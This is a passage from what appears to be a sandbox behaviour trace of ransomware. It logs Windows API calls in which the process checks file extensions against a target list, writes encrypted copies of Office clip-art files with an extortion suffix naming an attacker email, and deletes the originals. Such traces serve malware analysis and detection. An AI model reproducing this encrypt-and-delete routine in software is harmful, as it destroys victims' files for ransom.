lstrcmpiW (lpString1=".xls", lpString2=".MID") returned 1 [0268.716] lstrlenW (lpString=".xlsx") returned 5 [0268.716] lstrcmpiW (lpString1=".xlsx", lpString2="7.MID") returned -1 [0268.716] lstrlenW (lpString=".ppt") returned 4 [0268.716] lstrcmpiW (lpString1=".ppt", lpString2=".MID") returned 1 [0268.716] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_07.MID") returned 63 [0268.716] lstrlenW (lpString=".zip") returned 4 [0268.717] lstrcmpiW (lpString1=".zip", lpString2=".MID") returned 1 [0268.717] lstrlenW (lpString=".rar") returned 4 [0268.717] lstrcmpiW (lpString1=".rar", lpString2=".MID") returned 1 [0268.717] lstrlenW (lpString=".bz2") returned 4 [0268.717] lstrcmpiW (lpString1=".bz2", lpString2=".MID") returned -1 [0268.717] lstrlenW (lpString=".7z") returned 3 [0268.717] lstrcmpiW (lpString1=".7z", lpString2="MID") returned -1 [0268.717] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_07.MID") returned 63 [0268.717] lstrlenW (lpString=".dbf") returned 4 [0268.717] lstrcmpiW (lpString1=".dbf", lpString2=".MID") returned -1 [0268.717] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_07.MID") returned 63 [0268.717] lstrlenW (lpString=".1cd") returned 4 [0268.717] lstrcmpiW (lpString1=".1cd", lpString2=".MID") returned -1 [0268.717] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_07.MID") returned 63 [0268.717] lstrlenW (lpString=".jpg") returned 4 [0268.717] lstrcmpiW (lpString1=".jpg", lpString2=".MID") returned -1 [0268.717] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_07.MID") returned 63 [0268.717] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_07.MID") returned 63 [0268.717] lstrlenW (lpString=".doc") returned 4 [0268.717] lstrcmpiW (lpString1=".doc", lpString2=".MID") returned -1 [0268.717] lstrlenW (lpString=".docx") returned 5 [0268.717] lstrcmpiW (lpString1=".docx", lpString2="7.MID") returned -1 [0268.717] lstrlenW (lpString=".pdf") returned 4 [0268.717] lstrcmpiW (lpString1=".pdf", lpString2=".MID") returned 1 [0268.717] lstrlenW (lpString=".xls") returned 4 [0268.717] lstrcmpiW (lpString1=".xls", lpString2=".MID") returned 1 [0268.717] lstrlenW (lpString=".xlsx") returned 5 [0268.717] lstrcmpiW (lpString1=".xlsx", lpString2="7.MID") returned -1 [0268.717] lstrlenW (lpString=".ppt") returned 4 [0268.717] lstrcmpiW (lpString1=".ppt", lpString2=".MID") returned 1 [0268.718] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_07.MID") returned 63 [0268.718] lstrlenW (lpString=".zip") returned 4 [0268.718] lstrcmpiW (lpString1=".zip", lpString2=".MID") returned 1 [0268.718] lstrlenW (lpString=".rar") returned 4 [0268.718] lstrcmpiW (lpString1=".rar", lpString2=".MID") returned 1 [0268.718] lstrlenW (lpString=".bz2") returned 4 [0268.718] lstrcmpiW (lpString1=".bz2", lpString2=".MID") returned -1 [0268.718] lstrlenW (lpString=".7z") returned 3 [0268.718] lstrcmpiW (lpString1=".7z", lpString2="MID") returned -1 [0268.718] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_07.MID") returned 63 [0268.718] lstrlenW (lpString=".dbf") returned 4 [0268.718] lstrcmpiW (lpString1=".dbf", lpString2=".MID") returned -1 [0268.718] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_07.MID") returned 63 [0268.718] lstrlenW (lpString=".1cd") returned 4 [0268.718] lstrcmpiW (lpString1=".1cd", lpString2=".MID") returned -1 [0268.718] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_07.MID") returned 63 [0268.718] lstrlenW (lpString=".jpg") returned 4 [0268.718] lstrcmpiW (lpString1=".jpg", lpString2=".MID") returned -1 [0268.718] lstrcmpiW (lpString1=".MID", lpString2=".USA") returned -1 [0268.718] lstrlenW (lpString="PARNT_08.MID") returned 12 [0268.718] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_08.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\parnt_08.mid"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x37c [0268.719] GetFileSizeEx (in: hFile=0x37c, lpFileSize=0x380ff1c | out: lpFileSize=0x380ff1c*=7347) returned 1 [0268.719] CloseHandle (hObject=0x37c) returned 1 [0268.719] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_08.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\parnt_08.mid")) returned 0x20 [0268.719] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_08.MID.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\parnt_08.mid.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0268.719] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_08.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\parnt_08.mid"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x37c [0268.719] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x380fec8 | out: lpNewFilePointer=0x0) returned 1 [0268.719] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x380fec8 | out: lpNewFilePointer=0x0) returned 1 [0268.719] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_08.MID.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\parnt_08.mid.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x390 [0268.720] GetLastError () returned 0x0 [0268.720] ReadFile (in: hFile=0x37c, lpBuffer=0x3df0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x380fed4, lpOverlapped=0x0 | out: lpBuffer=0x3df0020*, lpNumberOfBytesRead=0x380fed4*=0x1cb3, lpOverlapped=0x0) returned 1 [0268.721] WriteFile (in: hFile=0x390, lpBuffer=0x3df0020*, nNumberOfBytesToWrite=0x1cc0, lpNumberOfBytesWritten=0x380fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3df0020*, lpNumberOfBytesWritten=0x380fc9c*=0x1cc0, lpOverlapped=0x0) returned 1 [0268.722] ReadFile (in: hFile=0x37c, lpBuffer=0x3df0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x380fed4, lpOverlapped=0x0 | out: lpBuffer=0x3df0020*, lpNumberOfBytesRead=0x380fed4*=0x0, lpOverlapped=0x0) returned 1 [0268.722] WriteFile (in: hFile=0x390, lpBuffer=0x3df0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x380fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3df0020*, lpNumberOfBytesWritten=0x380fc9c*=0xec, lpOverlapped=0x0) returned 1 [0268.723] SetEndOfFile (hFile=0x390) returned 1 [0268.723] CloseHandle (hObject=0x390) returned 1 [0268.723] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x380fec8 | out: lpNewFilePointer=0x0) returned 1 [0268.723] SetEndOfFile (hFile=0x37c) returned 1 [0268.725] CloseHandle (hObject=0x37c) returned 1 [0268.725] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_08.MID.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0268.725] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_08.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\parnt_08.mid")) returned 1 [0268.725] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_08.MID") returned 63 [0268.725] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_08.MID") returned 63 [0268.725] lstrlenW (lpString=".doc") returned 4 [0268.726] lstrcmpiW (lpString1=".doc", lpString2=".MID") returned -1 [0268.726] lstrlenW (lpString=".docx") returned 5 [0268.726] lstrcmpiW (lpString1=".docx", lpString2="8.MID") returned -1 [0268.726] lstrlenW (lpString=".pdf") returned 4 [0268.726] lstrcmpiW (lpString1=".pdf", lpString2=".MID") returned 1 [0268.726] lstrlenW (lpString=".xls") returned 4 [0268.726] lstrcmpiW (lpString1=".xls", lpString2=".MID") returned 1 [0268.726] lstrlenW (lpString=".xlsx") returned 5 [0268.726] lstrcmpiW (lpString1=".xlsx", lpString2="8.MID") returned -1 [0268.726] lstrlenW (lpString=".ppt") returned 4 [0268.726] lstrcmpiW (lpString1=".ppt", lpString2=".MID") returned 1 [0268.726] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_08.MID") returned 63 [0268.726] lstrlenW (lpString=".zip") returned 4 [0268.726] lstrcmpiW (lpString1=".zip", lpString2=".MID") returned 1 [0268.726] lstrlenW (lpString=".rar") returned 4 [0268.726] lstrcmpiW (lpString1=".rar", lpString2=".MID") returned 1 [0268.726] lstrlenW (lpString=".bz2") returned 4 [0268.726] lstrcmpiW (lpString1=".bz2", lpString2=".MID") returned -1 [0268.726] lstrlenW (lpString=".7z") returned 3 [0268.726] lstrcmpiW (lpString1=".7z", lpString2="MID") returned -1 [0268.726] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_08.MID") returned 63 [0268.726] lstrlenW (lpString=".dbf") returned 4 [0268.726] lstrcmpiW (lpString1=".dbf", lpString2=".MID") returned -1 [0268.726] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_08.MID") returned 63 [0268.726] lstrlenW (lpString=".1cd") returned 4 [0268.726] lstrcmpiW (lpString1=".1cd", lpString2=".MID") returned -1 [0268.726] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_08.MID") returned 63 [0268.726] lstrlenW (lpString=".jpg") returned 4 [0268.726] lstrcmpiW (lpString1=".jpg", lpString2=".MID") returned -1 [0268.727] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_08.MID") returned 63 [0268.727] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_08.MID") returned 63 [0268.727] lstrlenW (lpString=".doc") returned 4 [0268.727] lstrcmpiW (lpString1=".doc", lpString2=".MID") returned -1 [0268.727] lstrlenW (lpString=".docx") returned 5 [0268.727] lstrcmpiW (lpString1=".docx", lpString2="8.MID") returned -1 [0268.727] lstrlenW (lpString=".pdf") returned 4 [0268.727] lstrcmpiW (lpString1=".pdf", lpString2=".MID") returned 1 [0268.727] lstrlenW (lpString=".xls") returned 4 [0268.727] lstrcmpiW (lpString1=".xls", lpString2=".MID") returned 1 [0268.727] lstrlenW (lpString=".xlsx") returned 5 [0268.727] lstrcmpiW (lpString1=".xlsx", lpString2="8.MID") returned -1 [0268.727] lstrlenW (lpString=".ppt") returned 4 [0268.727] lstrcmpiW (lpString1=".ppt", lpString2=".MID") returned 1 [0268.727] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_08.MID") returned 63 [0268.727] lstrlenW (lpString=".zip") returned 4 [0268.727] lstrcmpiW (lpString1=".zip", lpString2=".MID") returned 1 [0268.727] lstrlenW (lpString=".rar") returned 4 [0268.727] lstrcmpiW (lpString1=".rar", lpString2=".MID") returned 1 [0268.727] lstrlenW (lpString=".bz2") returned 4 [0268.727] lstrcmpiW (lpString1=".bz2", lpString2=".MID") returned -1 [0268.727] lstrlenW (lpString=".7z") returned 3 [0268.727] lstrcmpiW (lpString1=".7z", lpString2="MID") returned -1 [0268.727] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_08.MID") returned 63 [0268.727] lstrlenW (lpString=".dbf") returned 4 [0268.727] lstrcmpiW (lpString1=".dbf", lpString2=".MID") returned -1 [0268.727] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_08.MID") returned 63 [0268.727] lstrlenW (lpString=".1cd") returned 4 [0268.727] lstrcmpiW (lpString1=".1cd", lpString2=".MID") returned -1 [0268.727] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_08.MID") returned 63 [0268.728] lstrlenW (lpString=".jpg") returned 4 [0268.728] lstrcmpiW (lpString1=".jpg", lpString2=".MID") returned -1 [0268.728] lstrcmpiW (lpString1=".MID", lpString2=".USA") returned -1 [0268.728] lstrlenW (lpString="PARNT_09.MID") returned 12 [0268.728] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_09.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\parnt_09.mid"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x37c [0268.728] GetFileSizeEx (in: hFile=0x37c, lpFileSize=0x380ff1c | out: lpFileSize=0x380ff1c*=6764) returned 1 [0268.728] CloseHandle (hObject=0x37c) returned 1 [0268.728] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_09.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\parnt_09.mid")) returned 0x20 [0268.728] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_09.MID.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\parnt_09.mid.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0268.729] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_09.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\parnt_09.mid"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x37c [0268.729] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x380fec8 | out: lpNewFilePointer=0x0) returned 1 [0268.729] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x380fec8 | out: lpNewFilePointer=0x0) returned 1 [0268.729] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_09.MID.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\parnt_09.mid.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x390 [0268.729] GetLastError () returned 0x0 [0268.729] ReadFile (in: hFile=0x37c, lpBuffer=0x3df0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x380fed4, lpOverlapped=0x0 | out: lpBuffer=0x3df0020*, lpNumberOfBytesRead=0x380fed4*=0x1a6c, lpOverlapped=0x0) returned 1 [0268.730] WriteFile (in: hFile=0x390, lpBuffer=0x3df0020*, nNumberOfBytesToWrite=0x1a70, lpNumberOfBytesWritten=0x380fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3df0020*, lpNumberOfBytesWritten=0x380fc9c*=0x1a70, lpOverlapped=0x0) returned 1 [0268.731] ReadFile (in: hFile=0x37c, lpBuffer=0x3df0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x380fed4, lpOverlapped=0x0 | out: lpBuffer=0x3df0020*, lpNumberOfBytesRead=0x380fed4*=0x0, lpOverlapped=0x0) returned 1 [0268.731] WriteFile (in: hFile=0x390, lpBuffer=0x3df0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x380fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3df0020*, lpNumberOfBytesWritten=0x380fc9c*=0xec, lpOverlapped=0x0) returned 1 [0268.731] SetEndOfFile (hFile=0x390) returned 1 [0268.731] CloseHandle (hObject=0x390) returned 1 [0268.731] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x380fec8 | out: lpNewFilePointer=0x0) returned 1 [0268.731] SetEndOfFile (hFile=0x37c) returned 1 [0268.734] CloseHandle (hObject=0x37c) returned 1 [0268.734] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_09.MID.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0268.734] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_09.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\parnt_09.mid")) returned 1 [0268.734] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_09.MID") returned 63 [0268.734] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_09.MID") returned 63 [0268.734] lstrlenW (lpString=".doc") returned 4 [0268.734] lstrcmpiW (lpString1=".doc", lpString2=".MID") returned -1 [0268.734] lstrlenW (lpString=".docx") returned 5 [0268.734] lstrcmpiW (lpString1=".docx", lpString2="9.MID") returned -1 [0268.734] lstrlenW (lpString=".pdf") returned 4 [0268.734] lstrcmpiW (lpString1=".pdf", lpString2=".MID") returned 1 [0268.734] lstrlenW (lpString=".xls") returned 4 [0268.734] lstrcmpiW (lpString1=".xls", lpString2=".MID") returned 1 [0268.734] lstrlenW (lpString=".xlsx") returned 5 [0268.734] lstrcmpiW (lpString1=".xlsx", lpString2="9.MID") returned -1 [0268.734] lstrlenW (lpString=".ppt") returned 4 [0268.735] lstrcmpiW (lpString1=".ppt", lpString2=".MID") returned 1 [0268.735] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_09.MID") returned 63 [0268.735] lstrlenW (lpString=".zip") returned 4 [0268.735] lstrcmpiW (lpString1=".zip", lpString2=".MID") returned 1 [0268.735] lstrlenW (lpString=".rar") returned 4 [0268.735] lstrcmpiW (lpString1=".rar", lpString2=".MID") returned 1 [0268.735] lstrlenW (lpString=".bz2") returned 4 [0268.735] lstrcmpiW (lpString1=".bz2", lpString2=".MID") returned -1 [0268.735] lstrlenW (lpString=".7z") returned 3 [0268.735] lstrcmpiW (lpString1=".7z", lpString2="MID") returned -1 [0268.735] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_09.MID") returned 63 [0268.735] lstrlenW (lpString=".dbf") returned 4 [0268.735] lstrcmpiW (lpString1=".dbf", lpString2=".MID") returned -1 [0268.735] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_09.MID") returned 63 [0268.735] lstrlenW (lpString=".1cd") returned 4 [0268.735] lstrcmpiW (lpString1=".1cd", lpString2=".MID") returned -1 [0268.735] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_09.MID") returned 63 [0268.735] lstrlenW (lpString=".jpg") returned 4 [0268.735] lstrcmpiW (lpString1=".jpg", lpString2=".MID") returned -1 [0268.735] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_09.MID") returned 63 [0268.735] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_09.MID") returned 63 [0268.735] lstrlenW (lpString=".doc") returned 4 [0268.735] lstrcmpiW (lpString1=".doc", lpString2=".MID") returned -1 [0268.735] lstrlenW (lpString=".docx") returned 5 [0268.735] lstrcmpiW (lpString1=".docx", lpString2="9.MID") returned -1 [0268.735] lstrlenW (lpString=".pdf") returned 4 [0268.736] lstrcmpiW (lpString1=".pdf", lpString2=".MID") returned 1 [0268.736] lstrlenW (lpString=".xls") returned 4 [0268.736] lstrcmpiW (lpString1=".xls", lpString2=".MID") returned 1 [0268.736] lstrlenW (lpString=".xlsx") returned 5 [0268.736] lstrcmpiW (lpString1=".xlsx", lpString2="9.MID") returned -1 [0268.736] lstrlenW (lpString=".ppt") returned 4 [0268.736] lstrcmpiW (lpString1=".ppt", lpString2=".MID") returned 1 [0268.736] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_09.MID") returned 63 [0268.736] lstrlenW (lpString=".zip") returned 4 [0268.736] lstrcmpiW (lpString1=".zip", lpString2=".MID") returned 1 [0268.736] lstrlenW (lpString=".rar") returned 4 [0268.736] lstrcmpiW (lpString1=".rar", lpString2=".MID") returned 1 [0268.736] lstrlenW (lpString=".bz2") returned 4 [0268.736] lstrcmpiW (lpString1=".bz2", lpString2=".MID") returned -1 [0268.736] lstrlenW (lpString=".7z") returned 3 [0268.736] lstrcmpiW (lpString1=".7z", lpString2="MID") returned -1 [0268.736] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_09.MID") returned 63 [0268.736] lstrlenW (lpString=".dbf") returned 4 [0268.736] lstrcmpiW (lpString1=".dbf", lpString2=".MID") returned -1 [0268.736] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_09.MID") returned 63 [0268.736] lstrlenW (lpString=".1cd") returned 4 [0268.736] lstrcmpiW (lpString1=".1cd", lpString2=".MID") returned -1 [0268.736] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_09.MID") returned 63 [0268.736] lstrlenW (lpString=".jpg") returned 4 [0268.736] lstrcmpiW (lpString1=".jpg", lpString2=".MID") returned -1 [0268.736] lstrcmpiW (lpString1=".MID", lpString2=".USA") returned -1 [0268.736] lstrlenW (lpString="PARNT_10.MID") returned 12 [0268.737] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_10.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\parnt_10.mid"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x37c [0268.737] GetFileSizeEx (in: hFile=0x37c, lpFileSize=0x380ff1c | out: lpFileSize=0x380ff1c*=5393) returned 1 [0268.737] CloseHandle (hObject=0x37c) returned 1 [0268.741] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_10.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\parnt_10.mid")) returned 0x20 [0268.741] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_10.MID.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\parnt_10.mid.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0268.742] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_10.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\parnt_10.mid"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x37c [0268.742] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x380fec8 | out: lpNewFilePointer=0x0) returned 1 [0268.742] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x380fec8 | out: lpNewFilePointer=0x0) returned 1 [0268.742] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_10.MID.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\parnt_10.mid.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x390 [0268.742] GetLastError () returned 0x0 [0268.742] ReadFile (in: hFile=0x37c, lpBuffer=0x3df0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x380fed4, lpOverlapped=0x0 | out: lpBuffer=0x3df0020*, lpNumberOfBytesRead=0x380fed4*=0x1511, lpOverlapped=0x0) returned 1 [0268.744] WriteFile (in: hFile=0x390, lpBuffer=0x3df0020*, nNumberOfBytesToWrite=0x1520, lpNumberOfBytesWritten=0x380fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3df0020*, lpNumberOfBytesWritten=0x380fc9c*=0x1520, lpOverlapped=0x0) returned 1 [0268.745] ReadFile (in: hFile=0x37c, lpBuffer=0x3df0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x380fed4, lpOverlapped=0x0 | out: lpBuffer=0x3df0020*, lpNumberOfBytesRead=0x380fed4*=0x0, lpOverlapped=0x0) returned 1 [0268.745] WriteFile (in: hFile=0x390, lpBuffer=0x3df0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x380fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3df0020*, lpNumberOfBytesWritten=0x380fc9c*=0xec, lpOverlapped=0x0) returned 1 [0268.745] SetEndOfFile (hFile=0x390) returned 1 [0268.745] CloseHandle (hObject=0x390) returned 1 [0268.745] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x380fec8 | out: lpNewFilePointer=0x0) returned 1 [0268.745] SetEndOfFile (hFile=0x37c) returned 1 [0268.764] CloseHandle (hObject=0x37c) returned 1 [0268.764] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_10.MID.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0268.770] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_10.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\parnt_10.mid")) returned 1 [0268.770] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_10.MID") returned 63 [0268.770] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_10.MID") returned 63 [0268.770] lstrlenW (lpString=".doc") returned 4 [0268.770] lstrcmpiW (lpString1=".doc", lpString2=".MID") returned -1 [0268.770] lstrlenW (lpString=".docx") returned 5 [0268.770] lstrcmpiW (lpString1=".docx", lpString2="0.MID") returned -1 [0268.770] lstrlenW (lpString=".pdf") returned 4 [0268.770] lstrcmpiW (lpString1=".pdf", lpString2=".MID") returned 1 [0268.770] lstrlenW (lpString=".xls") returned 4 [0268.770] lstrcmpiW (lpString1=".xls", lpString2=".MID") returned 1 [0268.770] lstrlenW (lpString=".xlsx") returned 5 [0268.770] lstrcmpiW (lpString1=".xlsx", lpString2="0.MID") returned -1 [0268.770] lstrlenW (lpString=".ppt") returned 4 [0268.770] lstrcmpiW (lpString1=".ppt", lpString2=".MID") returned 1 [0268.770] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_10.MID") returned 63 [0268.770] lstrlenW (lpString=".zip") returned 4 [0268.770] lstrcmpiW (lpString1=".zip", lpString2=".MID") returned 1 [0268.770] lstrlenW (lpString=".rar") returned 4 [0268.770] lstrcmpiW (lpString1=".rar", lpString2=".MID") returned 1 [0268.770] lstrlenW (lpString=".bz2") returned 4 [0268.770] lstrcmpiW (lpString1=".bz2", lpString2=".MID") returned -1 [0268.770] lstrlenW (lpString=".7z") returned 3 [0268.770] lstrcmpiW (lpString1=".7z", lpString2="MID") returned -1 [0268.770] lstrlenW (lpString="C:\\Program Files\\Microsoft 